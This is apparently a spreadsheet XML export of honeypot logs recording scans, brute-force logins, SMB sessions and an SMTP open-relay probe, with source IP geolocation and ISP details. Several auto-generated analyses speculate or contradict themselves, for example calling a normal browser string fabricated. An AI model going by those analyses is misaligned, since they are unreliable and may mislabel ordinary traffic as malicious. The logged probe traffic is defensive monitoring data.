    <x v="0"/>
    <d v="2025-04-27T12:11:32"/>
    <d v="2025-03-01T23:22:51"/>
    <d v="2025-04-27T12:11:32"/>
    <n v="57"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation"/>
    <s v="medium"/>
    <s v="SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="64105&amp;&amp;25&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214943"/>
    <s v="Railnet LLC"/>
    <s v="Railnet LLC"/>
    <s v="business"/>
    <s v="Virtualine Technologies"/>
    <s v="2000-06-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 1 Mar 2025 11:37:07 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '5.182.38.84_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 1 Mar 2025 23:53:17 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 6 Mar 2025 14:11:18 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d5d1:9655"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No activity detected via SMTP service, possibly indicating a failed or unauthorized attempt to send emails. No incoming or outgoing email attempts were made from this source during the monitoring period. This suggests potential malicious intent was blocked. &amp;&amp; This log entry suggests an attempt to reset a connection to a mail server, possibly indicating a scanning or probing activity for vulnerabilities. It may be part of a reconnaissance phase before launching a more targeted attack. The attacker is likely verifying if the target can be exploited for email-based malicious activities."/>
    <s v="Brute Force &amp;&amp; SPAM ATTACK"/>
  </r>
  <r>
    <x v="667"/>
    <x v="667"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T12:05:57"/>
    <d v="2025-04-27T12:05:57"/>
    <d v="2025-04-27T12:05:57"/>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e:89d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity was detected via Telnet service but this could be an indication that no users attempted to connect or login through this specific port which may raise suspicion of potential malicious activities targeting other services. The lack of activity on the Telnet service might indicate an attacker avoiding detection by not using it. This could also mean a legitimate user never needed to use the service. &amp;&amp; No suspicious activity detected for telnet service, connection attempt or login unsuccessful. Data is unknown or not available. Service remains inactive at this point."/>
    <m/>
  </r>
  <r>
    <x v="668"/>
    <x v="668"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T11:43:19"/>
    <d v="2023-11-24T21:24:30"/>
    <d v="2025-04-27T11:43:19"/>
    <n v="472"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="445&amp;&amp;65473&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Anyang-si"/>
    <s v="Anyang-si (Deokcheon-ro)"/>
    <s v="1846898"/>
    <s v="14088"/>
    <s v="37.3881"/>
    <s v="126.936"/>
    <s v="3786"/>
    <s v="LG DACOM Corporation"/>
    <s v="LG DACOM Corporation"/>
    <s v="business"/>
    <s v="Boranet"/>
    <s v="2005-03-16"/>
    <s v="BORANET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3a48:7cd5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="669"/>
    <x v="669"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T11:36:22"/>
    <d v="2025-04-27T11:36:22"/>
    <d v="2025-04-27T11:36:22"/>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d1:2809"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is no log data for TELNET service, indicating either no activity or failed detection of malicious behavior related to this service. This lack of activity could be due to successful blocking or absence of attempts to exploit the TELNET service. &amp;&amp; Telnet service is being probed or scanned by an unknown entity with no apparent malicious intentions, but this could be a precursor to a more significant threat. The lack of activity on the Telnet service suggests that it may not be actively exploited at this moment. The data indicates potential reconnaissance."/>
    <m/>
  </r>
  <r>
    <x v="670"/>
    <x v="670"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T11:29:31"/>
    <d v="2025-04-27T11:12:20"/>
    <d v="2025-04-27T11:29:31"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="50266"/>
    <s v="Odido Netherlands B.V."/>
    <s v="Odido Netherlands"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2e0:9489"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="A login attempt was made from an Android device with a suspicious browser signature, suggesting potential unauthorized access attempts. The browser version appears to be fabricated, indicating possible spoofing or fake identification. This may indicate a malicious actor trying to gain unauthorized access. &amp;&amp; Potential unauthorized access attempt from an Android device with user agent matching a common browser fingerprint. Possible brute force login or credential harvesting activity. Device is likely scanning for vulnerable services to exploit. &amp;&amp; A user is attempting to login via HTTP, likely using stolen credentials or brute forcing a legitimate account, utilizing an Android device and a custom browser configuration. The browser and device information is suspiciously vague, indicating potential tampering or spoofing. This activity suggests a malicious intent to gain unauthorized access. &amp;&amp; A possible brute-force attack is occurring as multiple HTTP login attempts are being made with the same user agent string from an Android device, indicating a potential automated login attempt from a malicious source. This could be part of a larger campaign to gain unauthorized access. The consistency in the user agent suggests a scripted approach."/>
    <m/>
  </r>
  <r>
    <x v="671"/>
    <x v="671"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T11:13:12"/>
    <d v="2025-04-27T11:13:12"/>
    <d v="2025-04-27T11:13:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4db:40a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No connection was established via TELNET service, indicating it may be idle or not being used. No notable malicious activity detected from this data point. This could indicate the service is offline or not accessible. &amp;&amp; No data was received for the TELNET service, possibly indicating no connection attempt or an inactive port. This could be due to legitimate or malicious reasons, such as a firewall blocking incoming connections or an attacker not attempting to access the service. The lack of data does not necessarily indicate malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="672"/>
    <x v="672"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T10:49:47"/>
    <d v="2025-01-18T21:45:26"/>
    <d v="2025-04-27T10:49:47"/>
    <n v="155"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;445&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="2004-09-21"/>
    <s v="CableLite"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50776)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,55502)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,59994)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,55517)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,56194)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,65420)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,49383)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50745)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,51227)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,63663)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,64406)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,59690)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,60250)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,58100)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,58539)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57255)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57852)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57427)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,59299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50484)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,50907)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,57635)}&amp;&amp;{Data_SMB:Incoming connection (202.83.16.51,58221)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca53:1033"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="SMB Scanning &amp;&amp; SMB Scan"/>
  </r>
  <r>
    <x v="673"/>
    <x v="673"/>
    <s v="42-98-34-202.static.netvigator.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T10:10:48"/>
    <d v="2024-11-27T07:35:20"/>
    <d v="2025-04-27T10:10:48"/>
    <n v="26"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="PCCW IMS Limited"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a62:22ca"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="674"/>
    <x v="674"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T10:07:55"/>
    <d v="2025-03-09T04:46:47"/>
    <d v="2025-04-27T10:07:55"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H29"/>
    <s v="3306&amp;&amp;445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SN"/>
    <s v="South Sulawesi"/>
    <s v="Takalar Regency"/>
    <s v="Takalar"/>
    <s v="1625546"/>
    <s v="NA"/>
    <s v="-5.41625"/>
    <s v="119.488"/>
    <s v="150461"/>
    <s v="PT Iftalink Media Karya"/>
    <s v="PT Iftalink Media Karya"/>
    <s v="business"/>
    <s v="PT Iftalink Media Karya"/>
    <s v="2022-11-15"/>
    <s v="IDNIC-IFTALINK-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.121.6,64291)}&amp;&amp;{Data_SMB:Incoming connection (103.93.121.6,65001)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:675d:7906"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The data suggests that an attempt was made to access MySQL services without providing any credentials or making a valid connection, indicating possible brute-force login attempts or scanning for vulnerabilities. This could be an attempt to gain unauthorized access to databases by exploiting weaknesses in the system. The lack of valid credentials indicates the actor may not have been successful in logging into the database."/>
    <m/>
  </r>
  <r>
    <x v="675"/>
    <x v="675"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T10:05:31"/>
    <d v="2025-04-27T10:05:31"/>
    <d v="2025-04-27T10:05:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="119"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="FA"/>
    <s v="Al Farwaniyah"/>
    <s v="NA"/>
    <s v="Al Farwānīyah"/>
    <s v="285815"/>
    <s v="NA"/>
    <s v="29.2775"/>
    <s v="47.9586"/>
    <s v="29357"/>
    <s v="WATANIYATELECOM-AS"/>
    <s v="National Mobile Telecommunications Company"/>
    <s v="consumer"/>
    <s v="Wataniya HSDPA Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bc46:1719"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="A possible brute force login attempt has been made from a Windows system using Google Chrome browser. The attacker's IP address is hidden behind a fake user agent string. This activity suggests an attempted unauthorized access to a web application or server. &amp;&amp; An attempt to login to a service using a fake browser and operating system combination is detected. The activity suggests an automated or scripted attack aiming to bypass authentication mechanisms. Multiple browsers and OS versions are being tested simultaneously."/>
    <m/>
  </r>
  <r>
    <x v="676"/>
    <x v="676"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T10:04:36"/>
    <d v="2025-04-27T10:04:36"/>
    <d v="2025-04-27T10:04:36"/>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2:45fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity was detected via TELNET service as there's no incoming traffic or connection attempt recorded. The &quot;NA&quot; indicates unknown, absent, or null status. This could be due to the absence of any TELNET-related events within the monitoring period. &amp;&amp; No activity detected for Telnet service, indicating potential scan or reconnaissance attempt by malicious actors to identify vulnerable services on the network. This could be an initial probing to gain access to other services later. The lack of traffic might also indicate a stealthy scanning technique used by some attackers."/>
    <m/>
  </r>
  <r>
    <x v="677"/>
    <x v="677"/>
    <s v="NA"/>
    <x v="6"/>
    <d v="2025-04-27T09:54:19"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-27T09:54:19"/>
    <n v="99"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_REDIS_H4"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;53&amp;&amp;30580&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="45102"/>
    <s v="Alibaba (US) Technology Co., Ltd."/>
    <s v="Alibaba (US) Technology Co., Ltd."/>
    <s v="hosting"/>
    <s v="Alibaba.com LLC"/>
    <s v="2016-03-17"/>
    <s v="AL-3"/>
    <s v="2017-04-26"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2f4c:d358"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-U"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="678"/>
    <x v="678"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T09:12:04"/>
    <d v="2025-04-27T00:35:38"/>
    <d v="2025-04-27T09:12:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;abuseipdb"/>
    <s v="5900&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="Quận Sáu"/>
    <s v="Quận Sáu"/>
    <s v="9645072"/>
    <s v="NA"/>
    <s v="10.7398"/>
    <s v="106.641"/>
    <s v="135901"/>
    <s v="Phuong Dong technology solution company limited"/>
    <s v="HIGHTECHK"/>
    <s v="business"/>
    <s v="High Tech K Software Services Company Limited"/>
    <s v="2021-08-25"/>
    <s v="HIGHTECHK-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ac:4f25"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No data provided, so there's nothing to analyze or explain. &amp;&amp; Insufficient log data provided for analysis."/>
    <m/>
  </r>
  <r>
    <x v="679"/>
    <x v="679"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T09:02:32"/>
    <d v="2025-04-27T09:02:32"/>
    <d v="2025-04-27T09:02:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
